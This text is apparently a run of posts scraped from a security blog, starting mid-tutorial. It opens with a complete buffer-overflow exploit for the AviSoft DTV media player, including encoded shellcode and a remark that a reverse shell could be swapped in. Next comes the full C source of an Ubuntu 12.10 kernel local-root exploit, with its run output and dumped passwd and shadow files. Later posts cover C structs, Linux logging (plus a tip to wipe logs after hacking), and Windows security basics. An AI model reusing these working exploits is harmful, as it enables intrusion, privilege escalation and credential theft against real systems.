"x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"
"x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
"x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
"xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
"xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
"xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff")


try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"

Now generate the file “badchar.PLF”. Attach the application with debugger, run, open “badchar.PLF” and use another mona command is :

!mona compare -f C:monaAviosoftDTVbytearray.bin

It will create another file called “compare.txt” when we will see like this:

open “compare.txt” in notepad and search for “stack”(http://pastebin.com/YLCnyne7) and after scrolling down a little bit i can see :

                | File           | Memory         | Note       
---------------------------------------------------------------
0 0 9 9 | 01 ... 09 | 01 ... 09 | unmodified!
---------------------------------------------------------------
9 9 99 100 | 0a ... 6c | 00 ... 61 | expanded
108 109 1 1 | 6d | 6d | unmodified!
109 110 5 5 | 6e 6f 70 71 72 | 20 46 69 6c 65 | corrupted
114 115 1 1 | 73 | 73 | unmodified!
115 116 2 2 | 74 75 | 5c 41 | corrupted
117 118 1 1 | 76 | 76 | unmodified!
118 119 137 137 | 77 ... ff | 69 ... 00 | corrupted

Possibly bad chars: 0a
Bytes omitted from input: 00

It is comparing data’s file and memory. If there is no bad char then File and Memory data will be same. See above the first line:

9   9   99  100 | 0a ... 6c      | 00 ... 61      | expanded 

Unfortunately it did not match. Mona also suggesting that the bad char may be “0a” because “0a” from file does not match to memory … is it?

So this time again we need to generate bytearray:

!mona bytearray -b "x00x0a"

Now we again need to compare with bytearray(See above, it is same)…. Just keep doing it until i found all bad chars.

                             

                                              EXECUTE SHELLCODE
By mona i found the bad chars are “x00xffx0ax0dx1a” . After found these bad chars i regenerated the shellcode:

root@pusheax.com:/usr/bin# msfpayload windows/exec cmd=calc R |msfencode -b "x00xffx0ax0dx1axff" -t c
[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)

unsigned char buf[] =
"xdaxdbxd9x74x24xf4x5bx31xc9xb1x32xb8x6exb9xe3"
"x05x31x43x17x83xc3x04x03x2dxaax01xf0x4dx24x4c"
"xfbxadxb5x2fx75x48x84x7dxe1x19xb5xb1x61x4fx36"
"x39x27x7bxcdx4fxe0x8cx66xe5xd6xa3x77xcbxd6x6f"
"xbbx4dxabx6dxe8xadx92xbexfdxacxd3xa2x0exfcx8c"
"xa9xbdx11xb8xefx7dx13x6ex64x3dx6bx0bxbaxcaxc1"
"x12xeax63x5dx5cx12x0fx39x7dx23xdcx59x41x6ax69"
"xa9x31x6dxbbxe3xbax5cx83xa8x84x51x0exb0xc1x55"
"xf1xc7x39xa6x8cxdfxf9xd5x4ax55x1cx7dx18xcdxc4"
"x7cxcdx88x8fx72xbaxdfxc8x96x3dx33x63xa2xb6xb2"
"xa4x23x8cx90x60x68x56xb8x31xd4x39xc5x22xb0xe6"
"x63x28x52xf2x12x73x38x05x96x09x05x05xa8x11x25"
"x6ex99x9axaaxe9x26x49x8fx06x6dxd0xb9x8ex28x80"
"xf8xd2xcax7ex3exebx48x8bxbex08x50xfexbbx55xd6"
"x12xb1xc6xb3x14x66xe6x91x76xe9x74x79x79";

Well, Let’s modify the script again,change the shellcode. The Final reliable working exploit is:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="x90"*260 #Found by mona.py
eip ="xabxa7x11x64" #EIP
junk="x90"*500 #500 nops before real shellcode

#msfpayload windows/exec cmd=calc R |msfencode -b "x00xffx0ax0dx1axff" -t c
shellcode=("xdaxdbxd9x74x24xf4x5bx31xc9xb1x32xb8x6exb9xe3"
"x05x31x43x17x83xc3x04x03x2dxaax01xf0x4dx24x4c"
"xfbxadxb5x2fx75x48x84x7dxe1x19xb5xb1x61x4fx36"
"x39x27x7bxcdx4fxe0x8cx66xe5xd6xa3x77xcbxd6x6f"
"xbbx4dxabx6dxe8xadx92xbexfdxacxd3xa2x0exfcx8c"
"xa9xbdx11xb8xefx7dx13x6ex64x3dx6bx0bxbaxcaxc1"
"x12xeax63x5dx5cx12x0fx39x7dx23xdcx59x41x6ax69"
"xa9x31x6dxbbxe3xbax5cx83xa8x84x51x0exb0xc1x55"
"xf1xc7x39xa6x8cxdfxf9xd5x4ax55x1cx7dx18xcdxc4"
"x7cxcdx88x8fx72xbaxdfxc8x96x3dx33x63xa2xb6xb2"
"xa4x23x8cx90x60x68x56xb8x31xd4x39xc5x22xb0xe6"
"x63x28x52xf2x12x73x38x05x96x09x05x05xa8x11x25"
"x6ex99x9axaaxe9x26x49x8fx06x6dxd0xb9x8ex28x80"
"xf8xd2xcax7ex3exebx48x8bxbex08x50xfexbbx55xd6"
"x12xb1xc6xb3x14x66xe6x91x76xe9x74x79x79")
shellcode+="x90"*900 #Okay, Need enough junk , so nops instead "A"

all=push+eip+junk+shellcode

try:
f.write(all)
f.close()
print "File created"
except:
print "File cannot be created"

After regenerating the “crash-me.PLF” open in AviSoft DTV and it will execute calc.exe. I did it in debugger with pressing F9:

Anytime We can change the windows/exec shellcode to reverse shellcode which will connect to my specified IP address with command shell. 

The same exploit will work on windows 7 too :

Because i used EIP address from the application itself. If i would use the EIP from OS dll then of course the exploit won’t work(The advantage of application’s dll).

This is it!

Note: Exploit writing is much more about research. Without researching it is not possible to be an exploit writer . If you have questions,advices, please comment here or mail me and i will try to answer(Love to discuss!).
If you want to learn more about exploit development(In details) , read corelan’s tutorial https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/.Much better than other commercial training :).

Backtrack reborn as Kali – downloaded Kali Linux

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

BackTrack Reborn as Kali Linux. Yesterday i have downloaded Kali Linux from http://www.kali.org/downloads/ which has gnome as default DE (Classic mode) . Most penetration testers knows about Backtrack Linux which was Ubuntu based. Now it is based on Debian which is big advantage of it. This is more nice that They made it more simpler and looks beautiful.

It seems they did not included much new tools , maybe they excluded some tools from the Kali Linux. There is also not any directory called /penetesting .

All tools are installed in /usr/bin and /usr/local/sbin . Peoples now need to search the tools using locate,whereis etc if they don’t know the name of tools. Truthfully, Kali(Backtrack Linux) now bit hard for newbie and Newbie should not try this pentesting distribution. But believe me, It is now enough good .

Note: using tools is not skid. Everybody uses tools. Operating system itself is a tool. They are skid who are doing the thing without knowing anything. You are good to go with new Kali linux if you are good in Linux(Debian).

Kali: http://www.kali.org/downloads/

Ubuntu 12.10 Local Root Exploit

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Everybody know Ubuntu is a popular Linux distro(Basically for newbie). Today i was visiting exploitdb and found the Ubuntu 12.10 Local root exploit which worked only on 64bit.

I have tested the code since i had Ubuntu 12.10 installed on my vm already.

Code:

#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;

int __attribute__((regparm(3)))
x()
{
commit_creds(prepare_kernel_cred(0));
return -1;
}

char stage1[] = "xffx25x00x00x00x00x00x00x00x00x00x00x00";

int main() {
int fd;
unsigned long mmap_start, mmap_size = 0x10000;
unsigned family;
struct {
struct nlmsghdr nlh;
struct unix_diag_req r;
} req;
char buf[8192];

if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
printf("Can't create sock diag socketn");
return -1;
}

memset(&req, 0, sizeof(req));
req.nlh.nlmsg_len = sizeof(req);
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
req.nlh.nlmsg_seq = 123456;

req.r.udiag_states = -1;
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

/* Ubuntu 12.10 x86_64 */
req.r.sdiag_family = 0x37;
commit_creds = (_commit_creds) 0xffffffff8107d180;
prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
mmap_start = 0x1a000;

if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {

printf("mmap faultn");
exit(1);
}

*(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
memset((void *)mmap_start, 0x90, mmap_size);
memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));

send(fd, &req, sizeof(req), 0);
if(!getuid())
system("/bin/sh");
}

test@weird:~/Documents$ gcc -o ubu *
test@weird:~/Documents$ ls
test.c ubu
test@weird:~/Documents$ ./ubu
# whoami
root

# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
avahi-autoipd:x:103:106:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
whoopsie:x:105:110::/nonexistent:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
colord:x:109:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
lightdm:x:110:118:Light Display Manager:/var/lib/lightdm:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
hplip:x:112:7:HPLIP system user,,,:/var/run/hplip:/bin/false
pulse:x:113:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
saned:x:114:123::/home/saned:/bin/false
kdm:x:115:65534::/home/kdm:/bin/false
test:x:1000:1000:test,,,:/home/test:/bin/bash
 # cat /etc/shadow
 root:!:15651:0:99999:7:::
daemon:*:15630:0:99999:7:::
bin:*:15630:0:99999:7:::
sys:*:15630:0:99999:7:::
sync:*:15630:0:99999:7:::
games:*:15630:0:99999:7:::
man:*:15630:0:99999:7:::
lp:*:15630:0:99999:7:::
mail:*:15630:0:99999:7:::
news:*:15630:0:99999:7:::
uucp:*:15630:0:99999:7:::
proxy:*:15630:0:99999:7:::
www-data:*:15630:0:99999:7:::
backup:*:15630:0:99999:7:::
list:*:15630:0:99999:7:::
irc:*:15630:0:99999:7:::
gnats:*:15630:0:99999:7:::
nobody:*:15630:0:99999:7:::
libuuid:!:15630:0:99999:7:::
syslog:*:15630:0:99999:7:::
messagebus:*:15630:0:99999:7:::
avahi-autoipd:*:15630:0:99999:7:::
usbmux:*:15630:0:99999:7:::
whoopsie:*:15630:0:99999:7:::
kernoops:*:15630:0:99999:7:::
rtkit:*:15630:0:99999:7:::
colord:*:15630:0:99999:7:::
lightdm:*:15630:0:99999:7:::
avahi:*:15630:0:99999:7:::
hplip:*:15630:0:99999:7:::
pulse:*:15630:0:99999:7:::
saned:*:15630:0:99999:7:::
kdm:*:15650:0:99999:7:::
test:$6$aoMcNoTU$IR6Ug3SthKdI4.ixdwf9rsIRsdz.4OACiabhaoxdd0NoYbjvxa9I.dj7VF7U4OaB7Oy2gDezCXL/oQx9riRXP0:15651:0:99999:7:::


This is really great !

Source: http://www.exploit-db.com/exploits/24746/

struct,typedef,array and pointer [all togther?]

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

This post is part of http://www.pusheax.com/2013/03/struct-and-typedef-of-c-programming.html . Such as struct, pointer, typedef example. I have did some more advanced things with struct:

#include <stdio.h>
#include <string.h>

int main()

{
//Yes We can declar a whole sentence in variable(Remember *):
char *str="We need to know programming for being a security resarcher.";




int *ptr; //We declaring c pointer which start with asteric!
int anotherN; // This int variable
anotherN=1337; //The current value of the declared variable.
int what; //A blank variable has been declared.




ptr=&anotherN; //This is the pointer trick. ptr now pointing to address of anotherN
what=*ptr; /*Now what=address_of_anotherN, and anotherN_address=1337. So what=1337.
            Whenever we are going to change the value of a variable using a pointer
            remember that we need the asteric. First we need "&" as reference address.
            then we need the asteric for getting final declaration and the value. */




*ptr=420; /* Remember that anotherN's value was 1337 ? But now it is 420. So we really
            can change the value anything by declaring new value. Remember that it will
            only change the value of the reference address. So in our case it "anotherN" */




printf("nnn%sn",str); //Print the value of "str"
printf("Value of what: %dn",what);
printf("Value of anotherN: %dn",anotherN);

//Time to go in advanced!




typedef struct pusheax

{
int push;
char add[20]; //It is not a problem using array.
}pUsheax; //The masked name



pUsheax instanc; //Getting instance name of the struct.
pUsheax *mypusheax; //Declaring "pusheax" type pointer. Yes we can have pointer in struct.

mypusheax=&instanc; //Pointing to instanc
instanc.push=100; //push=100




//Print the value of "push":
printf("The current value of "push" is: %dn",instanc.push);



mypusheax->push=200; /* Here is tricky? Now we are not changing the value using asteric.
                here we are using dash and "greater than" operator to redirect to
                declard variable. Data actually going mypusheax and mypusheax
                transfering the data to "push". So it shopisticately chage the value.*/



printf("Now "push"= %dnnn",instanc.push);

strcpy(mypusheax->add,"www.pusheax.com"); /*store the string pusheax.com in "add" array.
                            strcpy is evil. It causes the buffer overflow
                            if the "add" array gets fill with more than 20
                            value then stack will get overwriten. Because
                            strcpy does not check boundary. More secure function
                            is strncpy() :)*/


printf("ttttt%sn",instanc.add); //We print the current value of add[20] declared array.
printf("ttttt---------------n");
printf("ttttt%snnn",mypusheax->add); /* We also can get the value of add[] instead calling
                            calling instanc.add */



}

Compile and Run:

push@pusheax:~/code$ gcc strucptr.c -o strucptr
push@pusheax:~/code$ ./strucptr



We need to know programming for being a security resarcher.
Value of what: 1337
Value of anotherN: 420
The current value of "push" is: 100
Now "push"= 200


www.pusheax.com
---------------
www.pusheax.com


push@pusheax:~/code$

struct and typedef of C programming lanugage

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

C is really powerful system programming language. I believe most of experienced hacker,penetration tester,exploit developer has knowledge of C Language(At least basic). I am not professional or regular experienced programmer. I do coding when i feel of shortness :). Coding is really fun if we can compile without any error… no? I was been keeping forgetting the C structure syntax, The struct and typedef. So i quickly wrote this blog post with the complete code in case it is useful for someone ๐Ÿ™‚ . Just see the C comments for explanation of each line.  

#include <stdio.h>

int main()
{

struct pusheax /* struct is collection of variable. Declaring the name of the struct
                        which working like defining TYPE which is also called tag. So here
                        tag is "pusheax". we can call it "Name of struct" */

{
int number; //Variable under parent variable.
int number1; // Declaring another variable.
};



struct pusheax hacker; /* Here "hacker" is instance of "garbage" tag.
                    We must need it for calling variable properly. */



hacker.number=1337; /* now the value of the variable can be set like
                    "hacker.number". <instance.number=value> */
hacker.number1=31337;


//Same as normal printf function. But here we must need to add dot struct instance otherwise won't work:
printf("hacker.number is : %dn",hacker.number);
printf("hacker.number1 is: %dn",hacker.number1); //Same as previous.




struct ini //Another struct.

{
char *str; //It is going to be string pointer, Because the value won't be only "H" :).
int number; //Another variable.
};



struct ini string={0,0}; // We can also initialize the variable!



string.str="Hackers"; //The value of declared varible above under the struct "ini"
string.number=1337; //Another C variable




printf("Char is = %s & number is = %dn",string.str,string.number); /* Notice that we can delar
                        same variable without any class or function */

//Let use typedef keyword too.



typedef struct puSheax // new? It is structure definition. PuSeax is the name[tag].
//We can use it same as above structure

{
char *know; //C char variable
int knowing; // Another C Integer variable

}p00seax; // The alias name. This is what we are using typedef for.



p00seax p0sheax; //How fun? Now we declared another variable using the alias . Mask?
p0sheax.know="Knowledge is power!"; /*again we need to set the value. So it is completely related
                        with puSheax struct */

p0sheax.knowing=301337; // Same as above



printf("Value of "know": "%s" and value of "knowing" is : "%d"n",
p0sheax.know,p0sheax.knowing); // Perhaps nothing to explain here.


printf("nnnttpusheax.com is for independent ethical hacking,
        penetration testing,programming practice!!! ๐Ÿ™‚nnnt"); 
    puts(" Next: http://www.pusheax.com/2013/03/structtypedefarray-and-pointer-all.htmln");
 return 0;        //No error , just exit normally!

//compile: gcc struc.c -o struc
//run: ./struc
}

push@pusheax:~/code$ gcc struc.c -o struc;./struc
hacker.number is : 1337
hacker.number1 is: 31337
Char is = Hackers & number is = 1337
Value of "know": "Knowledge is power!" and value of "knowing" is : "301337"



pusheax.com is for independent ethical hacking,penetration testing,programming practice!!!:)
Next: http://www.pusheax.com/2013/03/structtypedefarray-and-pointer-all.html 

 simple?

If you have any questions please let’s discuss :).

Linux LOG files!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Today i was setting up iptables and keeping the logs file to separate files so that i can find the all alert,info easily. But writing a blog post quickly comes in my mind, in case,  any newbie want to have some basic idea about Linux logs(Trying to catch hacker? Not easy! hehe).   I am doing it on my Debian system( Later i will edit when i will do the same thing on other distro :)).
System logs are really important for storing System security, Security auditing, Debugging and other information in an specific files. These can be used for various security task , logging fake/real hackers, system issue etc.  Where the log files will be saved and what type of logs will be generated are specified in “/etc/rsyslog.conf” (Debian/Ubuntu). Here is my current configuration file :

#  /etc/rsyslog.conf    Configuration file for rsyslog.
#
# For more information see
# /usr/share/doc/rsyslog-doc/html/rsyslog_conf.html


#################
#### MODULES ####
#################

$ModLoad imuxsock # provides support for local system logging
$ModLoad imklog # provides kernel logging support
#$ModLoad immark # provides --MARK-- message capability

# provides UDP syslog reception
#$ModLoad imudp
#$UDPServerRun 514

# provides TCP syslog reception
#$ModLoad imtcp
#$InputTCPServerRun 514


###########################
#### GLOBAL DIRECTIVES ####
###########################

#
# Use traditional timestamp format.
# To enable high precision timestamps, comment out the following line.
#
$ActionFileDefaultTemplate RSYSLOG_TraditionalFileFormat

#
# Set the default permissions for all log files.
#
$FileOwner root
$FileGroup adm
$FileCreateMode 0640
$DirCreateMode 0755
$Umask 0022

#
# Where to place spool and state files
#
$WorkDirectory /var/spool/rsyslog

#
# Include all config files in /etc/rsyslog.d/
#
$IncludeConfig /etc/rsyslog.d/*.conf


###############
#### RULES ####
###############

#
# First some standard log files. Log by facility.
#
auth,authpriv.* /var/log/auth.log
*.*;auth,authpriv.none -/var/log/syslog
#cron.* /var/log/cron.log
daemon.* -/var/log/daemon.log
kern.* -/var/log/kern.log
lpr.* -/var/log/lpr.log
mail.* -/var/log/mail.log
user.* -/var/log/user.log
kern.warning /var/log/iptables.log

#
# Logging for the mail system. Split it up so that
# it is easy to write scripts to parse these files.
#
mail.info -/var/log/mail.info
mail.warn -/var/log/mail.warn
mail.err /var/log/mail.err

#
# Logging for INN news system.
#
news.crit /var/log/news/news.crit
news.err /var/log/news/news.err
news.notice -/var/log/news/news.notice

##striped

We need configure all about the logs in this file. Usually Linux/Unix store the logs in directory “/var/log/” if it is not customized. In “/var/log” we can find all log files:

 http://pastebin.com/d0LfNFfg

Let me explain few of them:

apt                ==      Package installation and removing logs.
auth.log       ==      Authorization related logs.
debug           ==      Debugging Logs.
dmesg           ==      Dump of kernel message buffer
exim4             ==     exim4 mail server logs.
faillog            ==     Fail login attempts.
kern.log         ==    kernel level log
lastlog           ==     Last loging information.
messages      ==     Main log file.
mail.*             ==     Mail related info,alert,warning
mysql             ==     mysql log
pure-ftpd       ==     FTP logs.
syslog           ==      main log file.
 wtmp           ==      Login Records.

Well, For customization the logs we need need to know few things which should be indicated in rsyslog.conf file:

1. Facility (What?) 2. Level (info,warning,alert etc)

Facility are:

auth         == Security & Authorization.
authpriv  == Private Authorization message.
cron         == Cron Daemon.
user         == user process.
mail          == Mail related message.
ftp            == FTP related .
kern         == Kernel related messages.
lpr            == Printer logs
etc.

Level are(Depends how much you want to know):

alert    == Urgent.
crit      == Critical messages.
warning == Warning messages.
notice  == Suggest to verify!
info      == Informational Messages.
debugg== Debugging Purpose.

From the configuration file it is understandable that how the Facility and Level should be indicated. For example:

mail.info            -/var/log/mail.info

Here “mail”  is the Facility “info” is the level and

/var/log/mail.info”  is telling where to save.

 Now i am going to show some example:

 Let’s how the SSH logs look like, SSH logs usually saved in “/var/log/auth.log”:

root@logtest:/var/log# cat auth.log

root@logtest:/var/log#

Blank!

So i first try fail login attemp:

science@BAD-LUCK:~$ ssh root@192.168.78.130

root@192.168.78.130's password:

Permission denied, please try again.

root@192.168.78.130's password:

Now let’s see what is in auth.log:

root@logtest:/var/log# cat auth.log

Feb 27 10:59:44 scientific sshd[4285]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=hacker.local user=root
Feb 27 10:59:46 scientific sshd[4285]: Failed password for root from 192.168.78.1 port 60904 ssh2
Feb 27 11:00:01 scientific CRON[4287]: pam_unix(cron:session): session opened for user root by (uid=0)
Feb 27 11:00:17 scientific CRON[4287]: pam_unix(cron:session): session closed for user root

It is clearly saying that "hacker"(computer name) tried to log with user root on port 22(ssh). In next line it is also saying the failed attempt was from192.168.78.1 .

I Again attempt to login to FTP server (ftp 192.168.78.1) . Then i saw the Authentication fail attempt also saved in auth.log:

Feb 27 11:23:08 scientific pure-ftpd: pam_unix(pure-ftpd:auth): check pass; user unknown
Feb 27 11:23:08 scientific pure-ftpd: pam_unix(pure-ftpd:auth): authentication failure; logname= uid=0 euid=0 tty=pure-ftpd ruser=aaaaaaaaaaaaa rhost=hacker.local

l

The logs can be saved in other place too if we indicate in rsyslog.conf . For example i have made my own log file to save iptables logs.

kern.warning  "/var/log/iptables.log"  #iptables communicate with kernel

If someone brute force any of the service such as ssh, ftp etc then all the fail attempt will be saved to auth.log(Be careful if you are trying to hack!:) always clean the logs file).

More:
http://en.wikipedia.org/wiki/Syslog
http://www.rsyslog.com/doc/manual.html

Windows Security Components !

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

There are some components which are for windows security. Often I have searched on google that how the windows security is actually implemented. From my understanding i want to describe the basic here so that any interested person can get some quick idea. See below:

SAM database: SAM is a databases where users information are stored. It stores all users information excluding domain users. The SAM can be found in HKEY_LOCAL_MACHINESAM and Directory : C:WINDOWSsystem32configSAM.

LSASS: Local Security Authority Subsystem(LSASS) is responsible for security policy of the windows system. It also alerts security warning to events logs. LSASS is completely responsible for users loging, password changing, token generating etc. If we open the task manager then we will see that there is a running process called lsass.exe as SyStEM user. If we force to exit this process then we have relogin to windows system.

 http://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service
http://www.neuber.com/taskmanager/process/lsass.exe.html

  WinLogon: http://technet.microsoft.com/en-us/library/cc780095%28v=ws.10%29.aspx

NetLogon: http://www.windowsitpro.com/article/domains2/the-netlogon-service-516

AppLocker: It specify which application, file can be used by an specified users. This can set Restriction to access specific file(Access control).

Active Directory: Active Directory stores information of users,groups, computers of domain. 

Security reference monitor (SRM): http://www.cs.gmu.edu/~menasce/osbook/nt/tsld034.html

Quickly written for searching purpose :)….

WINDOWS REGISTERY

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

–>

Windows Registry is a database which store all kind of windows system configuration. It store all the configuration about Kernel, Device, User configuration etc.
As a penetration tester or a advanced system administrator we need to have a clean understanding of Windows Registry. Because often times we need to configure the system manually. That is why I am going to explain the basic of windows Registry which i learned from various resource and experience and self-taught.
How the Registry deal with windows system:
  • The Boot configuration stored in Windows registry. Whenever the Windows system boot it first read all the configuration from registry hive then load into memory . The Next turn of Kernel!
  • When the Kernel start Initializing , it first read other configuration such as Devices configuration.
  • Then it start reading other required configuration such as Users configuration, Wallpaper, Screen saver etc.
There are many information is stored in registry. Keeping all information in one registry is horrible. There are different structure for each registry, here are few of them:
REG_NONE == NONE VALUE
REG_SZ == UNICODE STRING
REG_BINARY == BINARY DATA
REG_DWORD == 32 bit NUMBER (Double Word Number)
REG_DWORD_BIG_ENDIAN == A DWORD value, a 32-bit unsigned integer
REG_LINK == Symbolic Link
REG_FULL_RESOURCE_DESCRIPTION== Hardware Description
REG_QWORD == 64 bit Number
And The ROOT KEYS:
  • HKEY_CLASS_ROOT
  • HKEY_CURRENT_USER
  • HKEY_LOCAL_MACHNE
  • HKEY_USERS
  • HKEY_CURRENT_CONFIG
Let’s Explain these root keys below,
HKEY_CLASS_ROOT:Abbreviated HKCR, HKEY_CLASSES_ROOT contains information about registered applications, such as file associations and OLE Object Class IDs, tying them to the applications used to handle these items
HKEY_CURRENT_USER:
Here all the configuration of currently logged in users is stored.
There are 12th Subkey under the KKEY_CURRENT_USER:
AppEvents == Sound/Event
Console == Windows setting such as Scree color, width, Font size etc
Control Panel == Wallpaper, screensaver, mouse etc. Screenshot:
Environment == Environment variable definitions
EUDC ==
Identities ==
Keyboard Layout == Keyboard Layout (I.E U.S)
Network == Network Driver Setting
Printers == Printer Connection setting
Software == User-specific software information
System ==
Volatile Environment ==
HKEY_LOCAL_MACHINE:
In this root key all the system configuration is stored, such as HARDWARE, SAM, SOFTWARE,Computer name etc is stored in this root key:
Maleware,Backdoor,Keylogger and other malicious software also target this key.
HKEY_USERS:
HKEY_USERS contains subkeys corresponding to the HKEY_CURRENT_USER keys for each user profile actively loaded on the machine, though user hives are usually only loaded for currently logged-in users
If logged in as โ€œweird scienceโ€ then I can see there is a subkey :
and :
KEY_CURRENT_CONFIG:
Perhaps don’t need to explain it. If you still want to know about it then please search on Google. ๐Ÿ™‚
Hives :
Microsoft(copied and pasted): A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data.

Each time a new user logs on to a computer, a new hive is created for that user with a separate file for the user profile. This is called the user profile hive. A user’s hive contains specific registry information pertaining to the user’s application settings, desktop, environment, network connections, and printers. User profile hives are located under the HKEY_USERSkey More : http://msdn.microsoft.com/en-us/library/windows/desktop/ms724877%28v=vs.85%29.aspx

Next I will explain some security task in Windows registry when I will have some security related work in registry, Hope it will be soon ๐Ÿ™‚ . Stay tune !
Feel Free post your any questions related of windows registry! ๐Ÿ™‚
Reference: